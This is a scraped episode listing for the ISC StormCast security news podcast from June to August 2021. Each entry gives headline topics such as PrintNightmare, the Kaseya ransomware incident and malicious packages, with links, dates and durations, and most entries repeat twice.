Unsolicited DNS Queries https://isc.sans.edu/forums/diary/Unsolicited+DNS+Queries/27694/ Changing BAT Files on the Fly https://isc.sans.edu/forums/diary/Changing+BAT+Files+On+The+Fly/27700/ Empty NPM Package has Over 700,000 Downloads https://www.bleepingcomputer.com/news/software/empty-npm-package-has-over-700-000-downloads-heres-why/ Blocking PetitPotam with netsh RPC Filters https://twitter.com/gentilkiwi/status/1421949715986403329 Pneumatic Tube Vulnerabilities https://www.blackhat.com/us-21/briefings/schedule/index.html#a-hole-in-the-tube-uncovering-vulnerabilities-in-critical-infrastructure-of-healthcare-facilities-23546
8/3/20216 minutes, 12 seconds
Episode Artwork

ISC StormCast for Sunday, August 1st, 2021

Infected With a .reg File https://isc.sans.edu/forums/diary/Infected+With+a+reg+File/27692/ Excessive Exchange Permissions (Patched) https://bugs.chromium.org/p/project-zero/issues/detail?id=2186 Node.JS July 2021 Security Releases https://nodejs.org/en/blog/vulnerability/july-2021-security-releases-2/ Malicious PyPi Packages https://jfrog.com/blog/malicious-pypi-packages-stealing-credit-cards-injecting-code/ REvil / Darkside May be Back as Blackmatter https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/
8/1/20215 minutes, 26 seconds
Episode Artwork

ISC StormCast for Sunday, August 1st, 2021

Infected With a .reg File https://isc.sans.edu/forums/diary/Infected+With+a+reg+File/27692/ Excessive Exchange Permissions (Patched) https://bugs.chromium.org/p/project-zero/issues/detail?id=2186 Node.JS July 2021 Security Releases https://nodejs.org/en/blog/vulnerability/july-2021-security-releases-2/ Malicious PyPi Packages https://jfrog.com/blog/malicious-pypi-packages-stealing-credit-cards-injecting-code/ REvil / Darkside May be Back as Blackmatter https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/
8/1/20215 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, July 30th, 2021

Malicious Content Delivered Trhough archive.org https://isc.sans.edu/forums/diary/Malicious+Content+Delivered+Through+archiveorg/27688/ A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI https://arxiv.org/abs/2107.12699 Crimea "manifesto" deploys VBA Rat using double attack vectors https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/
7/30/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, July 30th, 2021

Malicious Content Delivered Trhough archive.org https://isc.sans.edu/forums/diary/Malicious+Content+Delivered+Through+archiveorg/27688/ A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI https://arxiv.org/abs/2107.12699 Crimea "manifesto" deploys VBA Rat using double attack vectors https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/
7/30/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, July 29th, 2021

A Sextortion E-Mail From ... IT Support?! https://isc.sans.edu/forums/diary/A+sextortion+email+fromIT+support/27682/ AV-Test Compares Android Anti-Virus Software https://www.av-test.org/en/news/15-security-apps-for-android-in-an-endurance-test/ Oscorp evolves into UBEL: Advanced Android Malware https://www.cleafy.com/cleafy-labs/ubel-oscorp-evolution QOMPLX Reboots Punkspider https://www.globenewswire.com/da/news-release/2021/07/20/2265860/0/en/QOMPLX-Reboots-Punkspider.html AFRINIC IPv4 Address Heist https://lists.afrinic.net/pipermail/community-discuss/2021-July/004122.html
7/29/20218 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, July 29th, 2021

A Sextortion E-Mail From ... IT Support?! https://isc.sans.edu/forums/diary/A+sextortion+email+fromIT+support/27682/ AV-Test Compares Android Anti-Virus Software https://www.av-test.org/en/news/15-security-apps-for-android-in-an-endurance-test/ Oscorp evolves into UBEL: Advanced Android Malware https://www.cleafy.com/cleafy-labs/ubel-oscorp-evolution QOMPLX Reboots Punkspider https://www.globenewswire.com/da/news-release/2021/07/20/2265860/0/en/QOMPLX-Reboots-Punkspider.html AFRINIC IPv4 Address Heist https://lists.afrinic.net/pipermail/community-discuss/2021-July/004122.html
7/29/20218 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, July 28th, 2021

Details about CVE-2021-30807. (Patch released Monday for MacOS/iOS) https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/ Zimbra 8.8.15 XSS and SSRF Vulnerability https://blog.sonarsource.com/zimbra-webmail-compromise-via-email LockBit Ransomware Uses Group Policies https://www.bleepingcomputer.com/news/security/lockbit-ransomware-automates-windows-domain-encryption-via-group-policies/ Microsoft Extending SafeLinks to Teams https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/microsoft-teams-gets-more-phishing-protection/ba-p/2585559
7/28/20216 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, July 28th, 2021

Details about CVE-2021-30807. (Patch released Monday for MacOS/iOS) https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/ Zimbra 8.8.15 XSS and SSRF Vulnerability https://blog.sonarsource.com/zimbra-webmail-compromise-via-email LockBit Ransomware Uses Group Policies https://www.bleepingcomputer.com/news/security/lockbit-ransomware-automates-windows-domain-encryption-via-group-policies/ Microsoft Extending SafeLinks to Teams https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/microsoft-teams-gets-more-phishing-protection/ba-p/2585559
7/28/20216 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, July 27th, 2021

Recovering Malspam Password https://isc.sans.edu/forums/diary/Failed+Malspam+Recovering+The+Password/27674/ Apple Patches 0-Day https://support.apple.com/en-us/HT201222 Attackers Adopt Exotic Programming Languages https://blogs.blackberry.com/en/2021/07/old-dogs-new-tricks-attackers-adopt-exotic-programming-languages LemonDuck/LemonCat Coinminers Going Multi-OS https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ GitHub Expending Supply Chain Security Support to Go https://github.blog/2021-07-22-github-supply-chain-security-features-go-community/
7/27/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, July 27th, 2021

Recovering Malspam Password https://isc.sans.edu/forums/diary/Failed+Malspam+Recovering+The+Password/27674/ Apple Patches 0-Day https://support.apple.com/en-us/HT201222 Attackers Adopt Exotic Programming Languages https://blogs.blackberry.com/en/2021/07/old-dogs-new-tricks-attackers-adopt-exotic-programming-languages LemonDuck/LemonCat Coinminers Going Multi-OS https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ GitHub Expending Supply Chain Security Support to Go https://github.blog/2021-07-22-github-supply-chain-security-features-go-community/
7/27/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, July 26th, 2021

PetitPotam ADCS Domain Admin Vulnerability https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/ XCSSET Mac Malware Target Google Chrome / Telegram https://thehackernews.com/2021/07/nasty-macos-malware-xcsset-now-targets.html Defunct Video Hosting Site Flooding Normal Websites With Porn https://www.vice.com/en/article/qj8xz3/a-defunct-video-hosting-site-is-flooding-normal-websites-with-hardcore-porn
7/26/20216 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, July 26th, 2021

PetitPotam ADCS Domain Admin Vulnerability https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/ XCSSET Mac Malware Target Google Chrome / Telegram https://thehackernews.com/2021/07/nasty-macos-malware-xcsset-now-targets.html Defunct Video Hosting Site Flooding Normal Websites With Porn https://www.vice.com/en/article/qj8xz3/a-defunct-video-hosting-site-is-flooding-normal-websites-with-hardcore-porn
7/26/20216 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, July 23rd, 2021

Akamai Outage https://isc.sans.edu/forums/diary/Lost+in+the+Cloud+Akamai+DNS+Outage/27660/ "Summer of SAM" Continues https://isc.sans.edu/forums/diary/Summer+of+SAM+Microsoft+Releases+Guidance+for+CVE202136934/27656/ Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujul2021.html Kaseya Decryptor Available https://www.kaseya.com/potential-attack-on-kaseya-vsa/ Jira Data Center and Jira Service Management Data Center Security Advisory https://confluence.atlassian.com/adminjiraserver/jira-data-center-and-jira-service-management-data-center-security-advisory-2021-07-21-1063571388.html Forgot password? Taking over user accounts Kaminsky style https://sec-consult.com/blog/detail/forgot-password-taking-over-user-accounts-kaminsky-style/
7/23/20216 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, July 23rd, 2021

Akamai Outage https://isc.sans.edu/forums/diary/Lost+in+the+Cloud+Akamai+DNS+Outage/27660/ "Summer of SAM" Continues https://isc.sans.edu/forums/diary/Summer+of+SAM+Microsoft+Releases+Guidance+for+CVE202136934/27656/ Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujul2021.html Kaseya Decryptor Available https://www.kaseya.com/potential-attack-on-kaseya-vsa/ Jira Data Center and Jira Service Management Data Center Security Advisory https://confluence.atlassian.com/adminjiraserver/jira-data-center-and-jira-service-management-data-center-security-advisory-2021-07-21-1063571388.html Forgot password? Taking over user accounts Kaminsky style https://sec-consult.com/blog/detail/forgot-password-taking-over-user-accounts-kaminsky-style/
7/23/20216 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, July 22nd, 2021

Microsoft Published Summer of SAM Guidance https://isc.sans.edu/forums/diary/Summer+of+SAM+Microsoft+Releases+Guidance+for+CVE202136934/27656/ Apple Patches Everything https://support.apple.com/en-us/HT201222 Formbook/XLoader Malware Ported to Mac https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/ Pulse Secure Backdoors https://us-cert.cisa.gov/ncas/current-activity/2021/07/21/malware-targeting-pulse-secure-devices
7/22/20216 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, July 22nd, 2021

Microsoft Published Summer of SAM Guidance https://isc.sans.edu/forums/diary/Summer+of+SAM+Microsoft+Releases+Guidance+for+CVE202136934/27656/ Apple Patches Everything https://support.apple.com/en-us/HT201222 Formbook/XLoader Malware Ported to Mac https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/ Pulse Secure Backdoors https://us-cert.cisa.gov/ncas/current-activity/2021/07/21/malware-targeting-pulse-secure-devices
7/22/20216 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, July 21st, 2021

Windows Registry Hives Permission Problem https://isc.sans.edu/forums/diary/Summer+of+SAM+incorrect+permissions+on+Windows+1011+hives/27652/ HP Printer Drivers Allows Privilege Escalation https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/ Linux Local Privilege Escalation in Filesystem Layer https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909 FortiManager and FortiAnalyzer Vulnerability https://www.fortiguard.com/psirt/FG-IR-21-067
7/21/20217 minutes
Episode Artwork

ISC StormCast for Wednesday, July 21st, 2021

Windows Registry Hives Permission Problem https://isc.sans.edu/forums/diary/Summer+of+SAM+incorrect+permissions+on+Windows+1011+hives/27652/ HP Printer Drivers Allows Privilege Escalation https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/ Linux Local Privilege Escalation in Filesystem Layer https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909 FortiManager and FortiAnalyzer Vulnerability https://www.fortiguard.com/psirt/FG-IR-21-067
7/21/20217 minutes
Episode Artwork

ISC StormCast for Tuesday, July 20th, 2021

New Windows Print Spooler Vulnerability - CVE-2021-34481 https://isc.sans.edu/forums/diary/New+Windows+Print+Spooler+Vulnerability+CVE202134481/27648/ iOS/WatchOS/tvOS/Safari Updates https://support.apple.com/en-us/HT201222 iOS Format String Vulnerability Exploitable as RCE https://blog.zecops.com/research/meet-wifidemon-ios-wifi-rce-0-day-vulnerability-and-a-zero-click-vulnerability-that-was-silently-patched/ Surfside Condo Collapse Scams https://threatpost.com/attackers-target-florida-condo-collapse-victims/167917/
7/20/20215 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, July 20th, 2021

New Windows Print Spooler Vulnerability - CVE-2021-34481 https://isc.sans.edu/forums/diary/New+Windows+Print+Spooler+Vulnerability+CVE202134481/27648/ iOS/WatchOS/tvOS/Safari Updates https://support.apple.com/en-us/HT201222 iOS Format String Vulnerability Exploitable as RCE https://blog.zecops.com/research/meet-wifidemon-ios-wifi-rce-0-day-vulnerability-and-a-zero-click-vulnerability-that-was-silently-patched/ Surfside Condo Collapse Scams https://threatpost.com/attackers-target-florida-condo-collapse-victims/167917/
7/20/20215 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, July 19th, 2021

Multiple BaseXX Obfuscations https://isc.sans.edu/forums/diary/Multiple+BaseXX+Obfuscations/27640/ Juniper Patches: Radius Vulnerability https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11180&cat=SIRT_1&actp=LIST fail2ban vulnerability https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm NSO Group Victims Leaked https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/ Dangers of Autofilling Passwords https://marektoth.com/blog/password-managers-autofill/#analysis
7/19/20216 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, July 19th, 2021

Multiple BaseXX Obfuscations https://isc.sans.edu/forums/diary/Multiple+BaseXX+Obfuscations/27640/ Juniper Patches: Radius Vulnerability https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11180&cat=SIRT_1&actp=LIST fail2ban vulnerability https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm NSO Group Victims Leaked https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/ Dangers of Autofilling Passwords https://marektoth.com/blog/password-managers-autofill/#analysis
7/19/20216 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, July 16th, 2021

USPS Phishing Kit Reporting Data Back Via Telegram https://isc.sans.edu/forums/diary/USPS+Phishing+Using+Telegram+to+Collect+Data/27630/ Sonicwall Warns of Ransomware https://www.sonicwall.com/support/product-notification/urgent-security-notice-critical-risk-to-unpatched-end-of-life-sra-sma-8-x-remote-access-devices/210713105333210/ WooCommerce Flaw Exploited https://www.wordfence.com/blog/2021/07/critical-sql-injection-vulnerability-patched-in-woocommerce/ KiwiSDR Backdoor https://www.bleepingcomputer.com/news/security/software-maker-removes-backdoor-giving-root-access-to-radio-devices/
7/16/20215 minutes, 58 seconds
Episode Artwork

ISC StormCast for Friday, July 16th, 2021

USPS Phishing Kit Reporting Data Back Via Telegram https://isc.sans.edu/forums/diary/USPS+Phishing+Using+Telegram+to+Collect+Data/27630/ Sonicwall Warns of Ransomware https://www.sonicwall.com/support/product-notification/urgent-security-notice-critical-risk-to-unpatched-end-of-life-sra-sma-8-x-remote-access-devices/210713105333210/ WooCommerce Flaw Exploited https://www.wordfence.com/blog/2021/07/critical-sql-injection-vulnerability-patched-in-woocommerce/ KiwiSDR Backdoor https://www.bleepingcomputer.com/news/security/software-maker-removes-backdoor-giving-root-access-to-radio-devices/
7/16/20215 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, July 15th, 2021

One way to fail at malspam - give reipients the wrong password https://isc.sans.edu/forums/diary/One+way+to+fail+at+malspam+give+recipients+the+wrong+password+for+an+encrypted+attachment/27634/ Firefox Updates https://www.mozilla.org/en-US/security/advisories/mfsa2021-28/ SAP Netweaver Vulnerabilities https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=580617506 Joker Android Fleezware https://blog.zimperium.com/joker-is-still-no-laughing-matter/ less.js RCE https://www.softwaresecured.com/exploiting-less-js
7/15/20215 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, July 15th, 2021

One way to fail at malspam - give reipients the wrong password https://isc.sans.edu/forums/diary/One+way+to+fail+at+malspam+give+recipients+the+wrong+password+for+an+encrypted+attachment/27634/ Firefox Updates https://www.mozilla.org/en-US/security/advisories/mfsa2021-28/ SAP Netweaver Vulnerabilities https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=580617506 Joker Android Fleezware https://blog.zimperium.com/joker-is-still-no-laughing-matter/ less.js RCE https://www.softwaresecured.com/exploiting-less-js
7/15/20215 minutes, 38 seconds
Episode Artwork

ISC StormCast for Wednesday, July 14th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+July+2021+Patch+Tuesday/27628/ Adobe Patch Tuesday https://helpx.adobe.com/security/products/acrobat/apsb21-51.html ForgeRock OpenAM Vulnerability https://backstage.forgerock.com/knowledge/kb/article/a47894244 GMail Supporting BIMI https://cloud.google.com/blog/products/identity-security/bringing-bimi-to-gmail-in-google-workspace
7/14/20216 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, July 14th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+July+2021+Patch+Tuesday/27628/ Adobe Patch Tuesday https://helpx.adobe.com/security/products/acrobat/apsb21-51.html ForgeRock OpenAM Vulnerability https://backstage.forgerock.com/knowledge/kb/article/a47894244 GMail Supporting BIMI https://cloud.google.com/blog/products/identity-security/bringing-bimi-to-gmail-in-google-workspace
7/14/20216 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, July 13th, 2021

Kaseya Releases Patch and Hardening Guide https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417 Solarwinds Advisory CVE-2021-35211 https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211 Mint Mobile Breach and Porting https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/ Twitter Verified Account Mistake https://twitter.com/conspirator0/status/1414475519609999366
7/13/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, July 13th, 2021

Kaseya Releases Patch and Hardening Guide https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417 Solarwinds Advisory CVE-2021-35211 https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211 Mint Mobile Breach and Porting https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/ Twitter Verified Account Mistake https://twitter.com/conspirator0/status/1414475519609999366
7/13/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, July 12th, 2021

Scanning for Microsoft Secure Socket Tunneling Protocol https://isc.sans.edu/forums/diary/Scanning+for+Microsoft+Secure+Socket+Tunneling+Protocol/27622/ Hancitor tries XLL as Initial Malware File https://isc.sans.edu/forums/diary/Hancitor+tries+XLL+as+initial+malware+file/27618/ Android Updates https://source.android.com/security/bulletin/2021-07-01 Cisco Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bpa-priv-esc-dgubwbH4 Job Seekers Attacked with Malicious Documents https://www.ehackingnews.com/2021/07/job-seeking-engineers-have-become.html
7/12/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, July 12th, 2021

Scanning for Microsoft Secure Socket Tunneling Protocol https://isc.sans.edu/forums/diary/Scanning+for+Microsoft+Secure+Socket+Tunneling+Protocol/27622/ Hancitor tries XLL as Initial Malware File https://isc.sans.edu/forums/diary/Hancitor+tries+XLL+as+initial+malware+file/27618/ Android Updates https://source.android.com/security/bulletin/2021-07-01 Cisco Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bpa-priv-esc-dgubwbH4 Job Seekers Attacked with Malicious Documents https://www.ehackingnews.com/2021/07/job-seeking-engineers-have-become.html
7/12/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, July 9th, 2021

Using Sudo With Python For More Security Controls https://isc.sans.edu/forums/diary/Using+Sudo+with+Python+For+More+Security+Controls/27614/ Fake Kaseya Updates Include CobaltStrike Payload https://www.theregister.com/2021/07/07/kaseya_malware_patches_/ WildPressure macOS Trojan https://www.kaspersky.com/about/press-releases/2021_wildpressures-multi-platform-malware-hits-macos-in-the-middle-east https://www.patreon.com/posts/53462690 iCloud Password Reset Weaknesss https://thezerohack.com/apple-vulnerability-bug-bounty
7/9/20215 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, July 9th, 2021

Using Sudo With Python For More Security Controls https://isc.sans.edu/forums/diary/Using+Sudo+with+Python+For+More+Security+Controls/27614/ Fake Kaseya Updates Include CobaltStrike Payload https://www.theregister.com/2021/07/07/kaseya_malware_patches_/ WildPressure macOS Trojan https://www.kaspersky.com/about/press-releases/2021_wildpressures-multi-platform-malware-hits-macos-in-the-middle-east https://www.patreon.com/posts/53462690 iCloud Password Reset Weaknesss https://thezerohack.com/apple-vulnerability-bug-bounty
7/9/20215 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, July 8th, 2021

Microsoft Releases Patches for CVE-2021-34527 UPDATED https://isc.sans.edu/forums/diary/Microsoft+Releases+Patches+for+CVE202134527/27610/ GitLab Update https://www.ehackingnews.com/2021/07/gitlab-fixes-several-vulnerabilities.html Vulnerable NuGet Packages https://blog.secure.software/third-party-code-comes-with-some-baggage
7/8/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, July 8th, 2021

Microsoft Releases Patches for CVE-2021-34527 UPDATED https://isc.sans.edu/forums/diary/Microsoft+Releases+Patches+for+CVE202134527/27610/ GitLab Update https://www.ehackingnews.com/2021/07/gitlab-fixes-several-vulnerabilities.html Vulnerable NuGet Packages https://blog.secure.software/third-party-code-comes-with-some-baggage
7/8/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, July 7th, 2021

Microsoft Releases Printnightmare Patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 Kaseya Update https://www.kaseya.com/potential-attack-on-kaseya-vsa/ Kaspersky Password Manager https://donjon.ledger.com/kaspersky-password-manager/ Amazon Echo Dot After Reset Artifacts https://dl.acm.org/doi/pdf/10.1145/3448300.3467820
7/7/20218 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, July 7th, 2021

Microsoft Releases Printnightmare Patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 Kaseya Update https://www.kaseya.com/potential-attack-on-kaseya-vsa/ Kaspersky Password Manager https://donjon.ledger.com/kaspersky-password-manager/ Amazon Echo Dot After Reset Artifacts https://dl.acm.org/doi/pdf/10.1145/3448300.3467820
7/7/20218 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, July 6th, 2021

Kaseya REvil Update https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/ Printnightmare Update https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/ https://github.com/LaresLLC/CVE-2021-1675 Expired RPM Key Problem https://github.com/rpm-software-management/rpm/issues/1598 Node.JS Update https://nodejs.org/en/blog/vulnerability/july-2021-security-releases/
7/6/20216 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, July 6th, 2021

Kaseya REvil Update https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/ Printnightmare Update https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/ https://github.com/LaresLLC/CVE-2021-1675 Expired RPM Key Problem https://github.com/rpm-software-management/rpm/issues/1598 Node.JS Update https://nodejs.org/en/blog/vulnerability/july-2021-security-releases/
7/6/20216 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, July 5th, 2021

Kaseya VSA REvil Ransomware Incident https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/
7/4/20215 minutes, 14 seconds
Episode Artwork

ISC StormCast for Monday, July 5th, 2021

Kaseya VSA REvil Ransomware Incident https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/
7/4/20215 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, July 2nd, 2021

Print Spooler printnightmare Update https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/ https://github.com/LaresLLC/CVE-2021-1675
7/2/20217 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, July 2nd, 2021

Print Spooler printnightmare Update https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/ https://github.com/LaresLLC/CVE-2021-1675
7/2/20217 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, July 1st, 2021

CVE-2021-1675 Incomplete Patch - Printnightmware https://isc.sans.edu/forums/diary/CVE20211675+Incomplete+Patch+and+Leaked+RCE+Exploit/27588/ Internet Explorer PDF Update https://support.microsoft.com/en-us/topic/june-29-2021-kb5004760-os-builds-19041-1082-19042-1082-and-19043-1082-out-of-band-9508f7a2-0713-432f-b06c-1ae6d802a2f7 NETGEAR Router Vulnerabilities (DGN-2200v1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
7/1/20216 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, July 1st, 2021

CVE-2021-1675 Incomplete Patch - Printnightmware https://isc.sans.edu/forums/diary/CVE20211675+Incomplete+Patch+and+Leaked+RCE+Exploit/27588/ Internet Explorer PDF Update https://support.microsoft.com/en-us/topic/june-29-2021-kb5004760-os-builds-19041-1082-19042-1082-and-19043-1082-out-of-band-9508f7a2-0713-432f-b06c-1ae6d802a2f7 NETGEAR Router Vulnerabilities (DGN-2200v1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
7/1/20216 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, June 30th, 2021

Google "Sweepstake" Phish Withouth Link https://isc.sans.edu/forums/diary/Diving+into+a+Google+Sweepstakes+Phishing+Email/27578/ Forensics Contest Solution / Winner https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest+Answers+and+Analysis/27582/ WD MyBook Details https://arstechnica.com/gadgets/2021/06/hackers-exploited-0-day-not-2018-bug-to-mass-wipe-my-book-live-devices/ Adobe Experience Manager PoC https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
6/30/20215 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, June 30th, 2021

Google "Sweepstake" Phish Withouth Link https://isc.sans.edu/forums/diary/Diving+into+a+Google+Sweepstakes+Phishing+Email/27578/ Forensics Contest Solution / Winner https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest+Answers+and+Analysis/27582/ WD MyBook Details https://arstechnica.com/gadgets/2021/06/hackers-exploited-0-day-not-2018-bug-to-mass-wipe-my-book-live-devices/ Adobe Experience Manager PoC https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
6/30/20215 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, June 28th, 2021

Increase in UDP Port 389 Scans (LDAP/AD) https://isc.sans.edu/forums/diary/Is+this+traffic+bAD/27566/ CD/DVD Destruction https://isc.sans.edu/forums/diary/DIY+CDDVD+Destruction/27572/ Zyxel Exploits https://twitter.com/JAMESWT_MHT/status/1407987022170578946 https://kb.zyxel.com/KB/searchArticle!viewDetail.action?articleOid=018137&lang=EN Cisco Vulnerability Exploited https://threatpost.com/cisco-asa-bug-exploited-poc/167274/ Microsoft Signs Netfilter Rootkit https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit
6/28/20216 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, June 28th, 2021

